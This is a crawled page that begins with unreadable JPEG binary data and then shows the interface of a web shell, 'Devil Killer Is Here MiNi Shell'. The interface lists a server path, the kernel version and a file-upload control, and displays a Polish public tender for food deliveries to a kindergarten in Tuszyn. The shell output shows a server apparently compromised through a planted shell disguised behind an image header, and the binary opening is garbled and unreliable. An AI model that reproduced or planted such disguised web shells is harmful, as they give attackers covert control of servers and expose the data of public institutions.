JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240311/0023989201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa artykułów żywnościowych dla Przedszkola Miejskiego Nr 2 „Pod sosnami” w Tuszynie w 2024 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PRZEDSZKOLE MIEJSKIE NR 2 &#34;POD SOSNAMI&#34; W TUSZYNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590347360</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sienkiewicza 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuszyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pm2tuszyn@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pm2tuszyn.szkolnastrona.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa artykułów żywnościowych dla Przedszkola Miejskiego Nr 2 „Pod sosnami” w Tuszynie w 2024 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f36503c2-dfa7-11ee-a01e-f641a8763d5f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00239892</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00228190/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywna dostawa artykuów żywnościowych w 2024r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f36503c2-dfa7-11ee-a01e-f641a8763d5f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o<br/>świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344):<br/>1.1 poprzez Platformę zakupową pod adresem: https://ezamowienia.gov.pl<br/>1.2 pocztą elektroniczną na adres: e-mail: pm2tuszyn@wp.pl<br/>3. Ogólne zasady korzystania z Platformy<br/>Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę e-Zamówienia) – zobowiązany jest zapoznać się z instrukcjami<br/>użytkowników Platformy e-Zamówienia – dostępnymi pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgłoszenie do postępowania<br/>wymaga zalogowania Wykonawcy do platformy: https://ezamowienia.gov.pl.<br/>3.2 Wykonawca przygotowuje ofertę przy pomocy interaktywnego „Formularza ofertowego” udostępnionego przez Zamawiającego<br/>na Platformie e-Zamówienia<br/>i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”.<br/>3.3 Zalogowany wykonawca używając przycisku „Wypełnij” widocznego pod „Formularzem ofertowym” zobowiązany jest do<br/>zweryfikowania poprawności danych automatycznie pobranych przez system z jego konta i uzupełnienia pozostałych informacji<br/>dotyczących wykonawcy/wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3.4 Następnie wykonawca powinien pobrać „Formularz ofertowy”, zapisać go na dysku komputera użytkownika, uzupełnić<br/>pozostałymi danymi wymaganymi przez Zamawiającego<br/>i ponownie zapisać na dysku komputera użytkownika oraz podpisać odpowiednim rodzajem podpisu elektronicznego, zgo3.5 Uwaga!<br/>Nie należy zmieniać nazwy pliku nadanej przez Platformę e-Zamówienia. Zapisany „Formularz ofertowy” należy zawsze otwierać w<br/>programie Adobe Acrobat Reader DC.<br/>3.6 Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej<br/>w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno<br/>składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij”<br/>i „upuść”) służące do dodawania plików.<br/>3.7 Następnie wykonawca powinien pobrać „Formularz ofertowy”, zapisać go na dysku komputera użytkownika, uzupełnić<br/>pozostałymi danymi wymaganymi przez Zamawiającego<br/>i ponownie zapisać na dysku komputera użytkownika oraz podpisać odpowiednim rodzajem podpisu elektronicznego, zgodnie z pkt<br/>7.<br/>dnie z pkt 7.3.9 Formularz ofertowy podpisuje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym w formacie PAdES typ wewnętrzny.<br/>3.9.1 Pozostałe dokumenty wchodzące w skład oferty lub składane wraz z ofertą, które są zgodnie z ustawą Pzp lub<br/>rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być zgodnie z wyborem wykonawcy/wykonawcy<br/>wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby opatrzone podpisem typu zewnętrznego lub<br/>wewnętrznego.<br/>W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) w polu „Załączniki<br/>i inne dokumenty przedstawione w ofercie przez Wykonawcę” dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym<br/>plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).W przypadku przekazywania dokumentu<br/>elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem<br/>wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia <br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>	1. administratorem Pani/Pana danych osobowych, Wykonawcy oraz osób, których dane Wykonawca przekazuje w niniejszym postępowaniu jest Przedszkole Miejskie nr 2 „Pod sosnami” w Tuszynie (zwanej dalej Przedszkolem) jest p. o. Dyrektora Przedszkola mgr Maja Kowalska;<br/>	2. kontakt z Inspektorem Ochrony Danych możliwy jest pod adresem e-mail: t.filipiak@secmed.pl; <br/>3.	Pani/Pana dane osobowe niezbędne do udziału w postępowaniu będą przetwarzane w celu związanym z realizacją postępowania o udzielenie zamówienia publicznego (przeprowadzenia postępowania o udzielenie zamówienia publicznego, wyłonienia wykonawcy, zawarcia umowy, realizacji zamówienia, rozliczenia finansowo – księgowego) pn. Sukcesywna dostawa artykułów żywnościowych dla Przedszkola Miejskiego nr 2 „Pod sosnami” w Tuszynie w 2024 roku na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz działanie przez administratora w interesie publicznym zgodnie z art. 6 ust. 1 lit. b, c i e oraz art. 10;<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 ze zm.), a ponadto odbiorcom danych w rozumieniu przepisów o ochronie danych osobowych tj. podmiotom świadczącym usługi pocztowe, kurierskie, usługi informatyczne, bankowe, ubezpieczeniowe, osobom i podmiotom zainteresowanym prowadzonym postępowaniem, a także podmiotom korzystającym z BIP Tuszyn i BZP, oraz platformy zakupowej. Odbiorcami będą również osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania na podstawie przepisów prawa (np. organom kontrolnym), inne podmioty, które na podstawie stosownych umów podpisanych z Zamawiającym przetwarzają dane osobowe, dla których Administratorem jest Zamawiający; <br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy lub udzielonej przez Wykonawcę gwarancji i rękojmi przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy lub trwania okresu gwarancji i rękojmi, z zastrzeżeniem że okres przechowywania danych w przypadku zamówień współfinansowanych ze środków unijnych wynika z przepisów dotyczących przyznania tych środków. Pani/Pana dane będą przechowywane zgodnie z terminami archiwizacji określonymi przez ustawy kompetencyjne lub ustawę z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego i ustawę z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach , w tym Rozporządzenie Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO i nie będą profilowane;<br/>8. posiada Pani/Pan:</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 – 3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania / zakończonego postępowania o udzielenie zamówienia publicznego lub konkursu;<br/>- na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b i c RODO. <br/><br/>Wykonawca wypełniając obowiązki informacyjne wynikające z art. 13 i/lub 14 RODO względem osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w tym postępowaniu składa stosowne oświadczenie zawarte w Formularzu ofertowym.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP1/03/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 136311,18 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część NR 1 WARZYWA, OWOCE ŚWIEŻE i JAJA <br/>owoce, warzywa i jaja. Owoce, warzywa, powinny być nie zwiędnięte, skorupka twarda, bez uszkodzeń zewnętrznych, owoce kulisto – stożkowate, dopuszcza się nieregularny intensywny kolor, skóra gładka, lśniąca, miąższ soczysty. Warzywa korzenne- korzenie powinny być jędrne, nie popękane, nie sparciałe, bez uszkodzeń przez szkodniki, bez plam. Jaja świeże bez popękanych skorupek. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 51182,90 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03220000-9 - Warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zrealizowania Umowy do wartości niższej niż określona w Formularzu ofertowym<br/>(ograniczenia zakresu zamówienia), w zależności od faktycznych potrzeb Zamawiającego, wynikających ze zmieniającej się<br/>liczby podopiecznych korzystających z wyżywienia, zmiany ilości poszczególnych produktów wymaganych jadłospisem.<br/>Zamawiający zobowiązuje się do zlecenia dostaw w/w przedmiocie zamówienia do wysokości min. 60 % wartości brutto<br/>wskazanej w Formularzu ofertowym wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-04-05 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty w oparciu o następujące kryteria dotyczy wszystkich części zamówienia:<br/>1) cena - (C) - 60%<br/>2) sposób dostawy (T) – 40%<br/> <br/>2. Sposób oceniania ofert:<br/>1) Kryterium &#34;cena&#34;<br/>W kryterium cena (C), w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najkorzystniejszy wskaźnik (cena), zostanie zastosowany następujący wzór:<br/><br/> <br/> Cn<br/> Liczba zdobytych punktów (C) = ----- x 100 pkt x waga kryterium 60%<br/> Cb<br/>Gdzie :<br/> Cn - cena najniższa wśród ofert nieodrzuconych<br/> Cb - cena oferty badanej<br/> 60% - procentowe znaczenie kryterium ceny.-60 pkt.ZP<br/><br/><br/>Liczba punktów, którą można uzyskać w ramach tego kryterium, obliczona zostanie przez podzielenie ceny najniższej z oferowanych przez cenę oferty badanej/ocenianej i pomnożenie tak otrzymanej liczby przez 100 pkt i wagę kryterium, którą ustalono na 60%.<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2023r. poz. 1570 z późn. zm.) dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. Wykonawca, składając ofertę, zobowiązany jest:<br/>1)	poinformować Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>2)	wskazać nazwy (rodzaje) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazać wartość towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4)	wskazać stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/> <br/>2)	Kryterium „sposób dostawy” (Sd)<br/>Wniesienie do magazynu– 40 PKT<br/>Siedziba placówki parter bez wniesienia do magazynu – 0 PKT<br/><br/>W przypadku gdy Wykonawca w formularzu ofertowym nie wskaże drugiego kryterium Zamawiający przyjmie, iż jest to sposób wskazany jako „Siedziba placówki parter bez wniesienia do magazynu” Wykonawca otrzyma – 0 punktów (dotyczy wszystkich części).<br/><br/>Zamawiający za najkorzystniejszą uzna ofertę z najwyższym bilansem uzyskanych punktów określonych przez Zamawiającego kryteriach wg wzoru:<br/><br/> L = C + Sd<br/> Gdzie :<br/>	L – sumaryczna liczba punktów oferty badanej,<br/>	C – punkty w kryterium cena,<br/>	Sd- punkty w kryterium sposób dostawy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) Kryterium „sposób dostawy” (Sd) Wniesienie do magazynu– 40 PKT Siedziba placówki parter bez wniesienia do magazynu – 0 PKT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Numer 2 mięso, drób, wędlina i podroby. Barwa mięsa świeżego powinna być bladoróżowa do czerwonej, soczyste, barwa, zapach, konsystencja, powierzchnia i przekrój mają świadczyć o świeżości produktu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 20347,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15112000-6 - Drób</p> <p class="mb-0">15114000-0 - Podroby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo zrealizowania Umowy do wartości niższej niż określona w Formularzu ofertowym<br/>(ograniczenia zakresu zamówienia), w zależności od faktycznych potrzeb Zamawiającego, wynikających ze zmieniającej się<br/>liczby podopiecznych korzystających z wyżywienia, zmiany ilości poszczególnych produktów wymaganych 